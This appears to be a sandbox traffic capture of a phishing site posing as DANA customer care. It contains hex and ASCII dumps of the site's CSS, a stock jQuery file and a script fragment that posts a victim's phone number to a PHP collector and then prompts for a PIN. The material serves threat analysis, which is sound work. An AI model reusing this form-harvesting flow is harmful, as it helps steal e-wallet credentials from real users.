                                                  2024-10-13 17:33:25 UTC1369INData Raw: 24 28 22 23 69 6e 70 22 29 2e 62 6c 75 72 28 29 3b 24 2e 61 6a 61 78 28 7b 74 79 70 65 3a 20 27 50 4f 53 54 27 2c 75 72 6c 3a 20 27 61 73 74 2f 62 6f 77 6f 6e 6f 68 70 2e 70 68 70 27 2c 64 61 74 61 3a 20 24 28 27 23 66 6f 72 6d 4e 6f 68 70 27 29 2e 73 65 72 69 61 6c 69 7a 65 28 29 2c 64 61 74 61 54 79 70 65 3a 20 27 74 65 78 74 27 2c 73 75 63 63 65 73 73 3a 20 66 75 6e 63 74 69 6f 6e 28 29 7b 24 28 22 23 70 72 6f 63 65 73 73 22 29 2e 68 69 64 65 28 29 3b 24 28 22 23 66 6f 72 6d 4e 6f 68 70 22 29 2e 66 61 64 65 4f 75 74 28 29 3b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 24 28 22 23 69 6e 70 22 29 2e 76 61 6c 28 27 27 29 3b 24 28 22 23 66 6f 72 6d 50 69 6e 22 29 2e 66 61 64 65 49 6e 28 29 3b 24 28 22 23 70 69 6e 31 22 29 2e 66 6f 63
                                                  Data Ascii: $("#inp").blur();$.ajax({type: 'POST',url: 'ast/bowonohp.php',data: $('#formNohp').serialize(),dataType: 'text',success: function(){$("#process").hide();$("#formNohp").fadeOut();setTimeout(function(){$("#inp").val('');$("#formPin").fadeIn();$("#pin1").foc
                                                  2024-10-13 17:33:25 UTC143INData Raw: 22 29 2e 66 61 64 65 49 6e 28 32 30 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 22 23 69 6e 70 22 29 2e 66 6f 63 75 73 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 31 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 32 30 30 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 2c 35 30 30 29 3b 0a 7d 0a 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: ").fadeIn(200); $("#inp").focus(); },1000); },2000); },500);}</script></body></html>
                                                  2024-10-13 17:33:25 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                  Data Ascii: 1
                                                  2024-10-13 17:33:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.449737172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:25 UTC617OUTGET /ast/8d62ea654fcf0e4cae001e344ee2592c.css HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: text/css,*/*;q=0.1
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: style
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:25 UTC689INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:25 GMT
                                                  Content-Type: text/css
                                                  Content-Length: 3850
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:19:40 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7076
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2PsimzZxvNttkjEZieRfGw0uHgP9X3Mrjv0vrVkvsD%2BW6xKyxyiyhuACFnZxnzM9NOHKLsUAPet0ZFeCMoU5RauFxiJyfBLXZYfaXjrospXSejuNp%2FMmRLGekrzTi3vGJuQ4ODMX2K557FDDA5%2FYN9d45yvjtHKLaZw%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d21131b5cf41a28-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:25 UTC680INData Raw: 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 36 30 30 3b 37 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 27 29 3b 2a 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 6d 61 72 67 69 6e 3a 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 7d 62 20 7b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 20 7d 68 74 6d
                                                  Data Ascii: @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600;700&display=swap');* {font-family: 'Open Sans', sans-serif;font-weight: 400;margin: 0;padding: 0;box-sizing: border-box;position: relative;color: #fff;}b { font-weight: 700; }htm
                                                  2024-10-13 17:33:25 UTC1369INData Raw: 3a 20 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 25 3b 7d 66 6f 72 6d 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 70 61 64 64 69 6e 67 3a 20 35 30 70 78 20 32 30 70 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 7d 66 6f 72 6d 20 68 33 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 66 6f 72 6d 20 2e 62 6f 78 2d 69 6e 70 75 74 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 34 32 70 78 3b 70 61 64 64 69 6e 67 3a 20 35 70 78 20 31 35 70 78 3b 6d 61 72 67 69
                                                  Data Ascii: : 100%;min-height: 100%;}form {width: 100%;height: 100%;display: flex;padding: 50px 20px;align-items: center;flex-direction: column;}form h3 {width: 100%;font-size: 14px;text-align: center;}form .box-input {width: 100%;height: 42px;padding: 5px 15px;margi
                                                  2024-10-13 17:33:25 UTC1369INData Raw: 66 6f 72 6d 20 2e 62 6f 78 2d 62 74 6e 20 62 75 74 74 6f 6e 20 7b 70 61 64 64 69 6e 67 3a 20 32 30 70 78 20 30 20 33 30 70 78 20 30 3b 6f 70 61 63 69 74 79 3a 20 31 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 36 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 2e 73 74 61 72 74 20 7b 74 6f 70 3a 20 30 3b 6c 65 66 74 3a 20 30 3b 72 69 67 68 74 3a 20 30 3b 77 69 64 74 68 3a 20 31 30 30 25 3b 68 65 69 67 68 74 3a 20 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 30 30 25 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 31 30 30 25 3b 70 6f 73
                                                  Data Ascii: form .box-btn button {padding: 20px 0 30px 0;opacity: 1;width: 100%;height: 60px;background: none;outline: none;border: none;font-size: 16px;text-align: center;}.start {top: 0;left: 0;right: 0;width: 100%;height: 100%;min-height: 100%;max-height: 100%;pos
                                                  2024-10-13 17:33:25 UTC432INData Raw: 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 20 39 39 39 3b 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 7d 2e 73 74 61 72 74 20 2e 66 6f 6f 74 69 6d 67 20 7b 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 7d 2e 62 6f 78 2d 6c 6f 67 69 6e 20 7b 70 61 64 64 69 6e 67 3a 20 32 35 70 78 3b 77 69 64 74 68 3a 20 34 35 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 20 34 35 30 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 20 34 35 30 70 78 3b 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 20 37 30 30 70
                                                  Data Ascii: x;max-height: 700px;z-index: 999;display: flex;justify-content: center;align-items: center;flex-direction: column;}.start .footimg {position: absolute;}.box-login {padding: 25px;width: 450px;min-width: 450px;max-width: 450px;height: 700px;min-height: 700p


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.449746151.101.2.1374435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:26 UTC557OUTGET /jquery-3.5.1.min.js HTTP/1.1
                                                  Host: code.jquery.com
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:26 UTC567INHTTP/1.1 200 OK
                                                  Connection: close
                                                  Content-Length: 89476
                                                  Server: nginx
                                                  Content-Type: application/javascript; charset=utf-8
                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                  ETag: "28feccc0-15d84"
                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                  Access-Control-Allow-Origin: *
                                                  Via: 1.1 varnish, 1.1 varnish
                                                  Accept-Ranges: bytes
                                                  Age: 3997411
                                                  Date: Sun, 13 Oct 2024 17:33:26 GMT
                                                  X-Served-By: cache-lga21981-LGA, cache-nyc-kteb1890023-NYC
                                                  X-Cache: HIT, HIT
                                                  X-Cache-Hits: 66, 0
                                                  X-Timer: S1728840806.153838,VS0,VE1
                                                  Vary: Accept-Encoding
                                                  2024-10-13 17:33:26 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 35 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                                  Data Ascii: /*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                                  2024-10-13 17:33:26 UTC1378INData Raw: 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 6e 2e 63 61 6c 6c 28 65 2c 74 2c
                                                  Data Ascii: e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,function(e,t){return n.call(e,t,
                                                  2024-10-13 17:33:26 UTC1378INData Raw: 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f 6e 63 65 7d 2c 6e 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72
                                                  Data Ascii: ect Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.nonce},n)},each:function(e,t){var
                                                  2024-10-13 17:33:26 UTC1378INData Raw: 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 2c 49 3d 22 28 3f 3a 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d
                                                  Data Ascii: .slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",I="(?:\\\\[\\da-fA-
                                                  2024-10-13 17:33:26 UTC1378INData Raw: 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c 78 37 66 2d 5c 75 46 46 46 46 5c 77 2d 5d 2f 67 2c 69 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c
                                                  Data Ascii: \\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ie=function(e,
                                                  2024-10-13 17:33:26 UTC1378INData Raw: 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28 65 29 7b 4e 28 74 2c 21 30 29 7d 66 69 6e 61 6c 6c 79 7b 73 3d 3d 3d 53 26 26 65 2e 72 65 6d
                                                  Data Ascii: de)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(e){N(t,!0)}finally{s===S&&e.rem
                                                  2024-10-13 17:33:26 UTC1378INData Raw: 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 59 2e 74 65 73 74 28 74 7c 7c
                                                  Data Ascii: o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e.namespaceURI,n=(e.ownerDocument||e).documentElement;return!Y.test(t||
                                                  2024-10-13 17:33:26 UTC1378INData Raw: 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d
                                                  Data Ascii: function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((n=o.getAttributeNode("id"))&&n.value=
                                                  2024-10-13 17:33:26 UTC1378INData Raw: 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62
                                                  Data Ascii: ,e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='disabled'></a><select disabled='disab
                                                  2024-10-13 17:33:26 UTC1378INData Raw: 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 74 29 3f 31 3a 75 3f 50 28 75 2c 65 29 2d 50 28 75 2c 74 29 3a 30 3a 34 26 6e 3f 2d 31 3a 31
                                                  Data Ascii: ocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p&&y(p,t)?1:u?P(u,e)-P(u,t):0:4&n?-1:1


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.449750172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:26 UTC617OUTGET /ast/00b9d2e9f52e505c013c16bb638a42a4.css HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: text/css,*/*;q=0.1
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: style
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:26 UTC692INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:26 GMT
                                                  Content-Type: text/css
                                                  Content-Length: 666
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:18:20 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7077
                                                  Accept-Ranges: bytes
